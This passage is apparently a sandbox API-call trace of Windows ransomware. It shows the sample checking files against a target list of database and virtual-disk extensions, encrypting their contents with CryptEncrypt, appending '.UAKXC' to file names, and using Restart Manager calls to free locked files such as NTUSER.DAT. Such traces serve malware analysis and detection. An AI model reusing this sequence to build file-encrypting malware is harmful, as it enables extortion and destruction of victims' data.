(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.353] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.354] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.355] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.356] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.357] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.358] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.358] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.359] WriteFile (in: hFile=0x210, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.436] WriteFile (in: hFile=0x210, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.436] SetEndOfFile (hFile=0x210) returned 1 [0141.437] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.437] ReadFile (in: hFile=0x210, lpBuffer=0x4100000, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x152, lpOverlapped=0x0) returned 1 [0141.437] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.437] WriteFile (in: hFile=0x210, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x152, lpOverlapped=0x0) returned 1 [0141.437] CloseHandle (hObject=0x210) returned 1 [0141.439] GetProcessHeap () returned 0xea0000 [0141.439] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0141.440] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" [0141.440] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.UAKXC" [0141.440] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn.uakxc")) returned 1 [0141.442] GetProcessHeap () returned 0xea0000 [0141.442] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0141.442] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef2b0 | out: hHeap=0xea0000) returned 1 [0141.442] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef27b8 | out: hHeap=0xea0000) returned 1 [0141.442] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0141.442] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0141.442] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0141.443] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat")) returned 0x2026 [0141.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.443] GetLastError () returned 0x20 [0141.443] LoadLibraryA (lpLibFileName="Rstrtmgr.dll") returned 0x753b0000 [0141.444] RmStartSession () returned 0x0 [0143.382] RmRegisterResources () returned 0x0 [0143.383] RmGetList () returned 0xea [0143.885] GetProcessHeap () returned 0xea0000 [0143.885] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x29c) returned 0xf37968 [0143.885] RmGetList () returned 0x0 [0144.025] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0144.026] GetCurrentProcess () returned 0xffffffff [0144.026] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0144.026] GetProcessId (Process=0xffffffff) returned 0xaec [0144.026] LoadLibraryA (lpLibFileName="Rstrtmgr.dll") returned 0x753b0000 [0144.026] RmShutdown () returned 0x15e [0144.198] GetProcessHeap () returned 0xea0000 [0144.198] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf37968 | out: hHeap=0xea0000) returned 1 [0144.198] LoadLibraryA (lpLibFileName="Rstrtmgr.dll") returned 0x753b0000 [0144.198] RmEndSession () returned 0x0 [0144.200] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0144.200] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2ad8 | out: hHeap=0xea0000) returned 1 [0144.200] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0144.201] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0144.201] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0144.202] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf")) returned 0x26 [0144.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.202] GetLastError () returned 0x20 [0144.202] RmStartSession () returned 0x0 [0144.204] RmRegisterResources () returned 0x0 [0144.206] RmGetList () returned 0xea [0144.301] GetProcessHeap () returned 0xea0000 [0144.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x29c) returned 0xef40f8 [0144.301] RmGetList () returned 0x0 [0144.384] GetCurrentProcess () returned 0xffffffff [0144.384] GetProcessId (Process=0xffffffff) returned 0xaec [0144.384] RmShutdown () returned 0x15e [0144.588] GetProcessHeap () returned 0xea0000 [0144.588] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef40f8 | out: hHeap=0xea0000) returned 1 [0144.588] RmEndSession () returned 0x0 [0144.592] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef0918 | out: hHeap=0xea0000) returned 1 [0144.592] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b50 | out: hHeap=0xea0000) returned 1 [0144.592] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0144.592] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0144.592] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0144.592] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini")) returned 0x6 [0144.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d0 [0144.593] GetLastError () returned 0x0 [0144.593] GetFileSizeEx (in: hFile=0x6d0, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=20) returned 1 [0144.593] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".4dd") returned 0x0 [0144.593] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".4dl") returned 0x0 [0144.593] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".accdb") returned 0x0 [0144.593] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".accdc") returned 0x0 [0144.593] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".accde") returned 0x0 [0144.593] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".accdr") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".accdt") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".accft") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".adb") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ade") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".adf") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".adp") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".arc") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ora") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".alf") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ask") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".btr") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".bdf") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".cat") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".cdb") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".ckp") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpSrch=".cma") returned 0x0 [0144.594] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS 